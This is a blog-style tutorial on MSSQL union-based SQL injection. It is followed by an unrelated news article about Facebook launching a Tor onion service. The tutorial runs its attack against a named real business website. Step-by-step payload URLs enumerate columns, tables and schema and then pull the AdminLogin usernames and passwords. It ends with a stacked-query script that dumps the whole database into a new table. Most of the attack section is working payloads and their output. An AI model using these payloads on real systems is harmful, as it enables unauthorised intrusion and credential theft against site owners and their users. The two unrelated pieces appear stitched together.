Step by Step MSSQL UNION BASED INJECTION

    MSSQL UNION BASED INJECTION

 

In the Name of ALLAH, the Most Beneficent and the Merciful.

So today i am going to write a tutorial on MSSQL injection. Hope you like it. But first i sujjest you that you must read the basics of sql Injection.
So lets start....

for this tutorial we will use that site..
http://aquaservices.co.in/Product.aspx?Id=13

So the checking, The 1st part is same as MySQL first putting the  single quote ( ' ) and then putting double quote ( " ) checking the error and i came to know this one is single quote based injection.

http://aquaservices.co.in/Product.aspx?Id=13'

It shows error like that.
 

INFORMATION::
When both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

Now we need to know the comment type for MSSQL.
   

Lets try with the basics. (--)

http://aquaservices.co.in/Product.aspx?Id=13--

Home page but missing contents.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1 --

Same as above.

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--

          Error.
"The ORDER BY position number 100 is out of range of the number of items in the select list. "
  

Now we can do with order by and at last we come to know that 8 is the last working column. Now the next part is using using the union select query.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8-

What again got the error.

Operand type clash: text is incompatible with int
 

In case of Such Errors in Union select statement we have an option to use null in all columns, so lets try that shit.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

we got another error.
  

The text data type cannot be selected as DISTINCT because it is not comparable.

Heres one more type of error you can find while doing MSSQL Injection and the solution of that error is just use "Union All Select" in place of "Unoin Select", Lets try that shit again.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again Error.. >.<

Conversion from type 'DBNull' to type 'String' is not valid.

The Solution of that type of Errors is as here we can see DBNULL to STRING mismatch so we have to convert each column one by one and see if we can get make it to work. To put a string we can use single quotes but i prefer using the db_name() function to avoid some error. Here we have Eight Columns changing each column one by one could be easy by it could be a pain when there are 20 or more columns so My friend Zenodermus Javanicus developed a payload generator to make that easy for us. I am gonna generate the payloads which will put db_name() in eight columns one by one.

Click Here For Payload
 
 

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--

Here we can see the second Column Getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,7,db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the Database name in Error)

  There are many other ways also to collect  more information from MSSQL which are given here:

Lets try ...

we can Put @@version on place of vulnerable column to get the current version from database.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

Got success..  
  

Now we will extract the table names, here the syntax is different than MySQL of lack of limit clause in MSSQL.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name : AdminLogin

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name : Certificate

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the Forth table name : ClientList

In the same manner we can get all the tables one by one. Now lets get the columns. I will extract the colums from AdminLogin table.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from AdminLogin Table : IsActive

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the Second column from AdminLogin Table : Password

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Third column from AdminLogin Table : UserName

We got the table names the column names and now lets extrct the data from them. For concatination we can use %2b which is +.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

At the i would like to show you a DIOS (dump in one shot Querry) made by my friend Zenodermus Javanicus which makes the process alot of faster.http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN ::
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name)
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : '
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give error but actually its making the DIOS table so now lets try checking
 the output under temp_dios_sample.





Hope You Like it.
Thanks.

#stay_connected.

Facebook is now available through Tor

Facebook is now available through Tor for ramped-up privacy

  

The "deep web" is not only home to shady online drug bazaars where you can exchange bitcoins for drugs, but also portals where whistle blowers can safely pass sensitive documents to journalists.

Now, it's also also home to Facebook.

The social network announced on Friday that it is now hosted directly on the Tor network to allow for an even more secure and private way to connect to Facebook.
People using Tor, software that allows for safe and anonymous web browsing, can now connect directly to Facebook using its new onion address (https://facebookcorewwwi.onion/), also known as a hidden service.

"It’s important to us at Facebook to provide methods for people to use our site securely," Alec Muffett, a Facebook security engineer, wrote in a post.
Runa Sandvik, a privacy and security researcher previously employed by the Tor Project, told that the idea of Facebook being hosted on the Tor network came during a conversation with Muffet.
Previously, users could use Tor to connect to Facebook.com, but they would run into a slew of issues — including getting locked out — because the connection would be routed around the world. Thus, it would appear as though a user was connecting from an unusual location, which Facebook treats as a red flag indicating an account has been hacked.
Now, however, you can log on and register on Facebook over Tor using the .onion site without running into these issues, according to Sandvik. "It does provide another level of protection for users who are already using Tor to log on to Facebook."
Connections to Facebook's .onion URL are also end-to-end encrypted, making it harder for hackers, spies or government officials to see what users' actions on the social network.
While some reacted with irony, noting that Facebook is usually not the greatest friend to privacy, others applauded the move.
Facebook's announcement comes just a few weeks after the company's latest privacy controversy. In September, some LGBT users complained of Facebook's real-name policy was preventing them from using the network with the name they identify with — even if it's not their legal one. After the uproar, Facebook apologized and hinted that it was going to change the policy.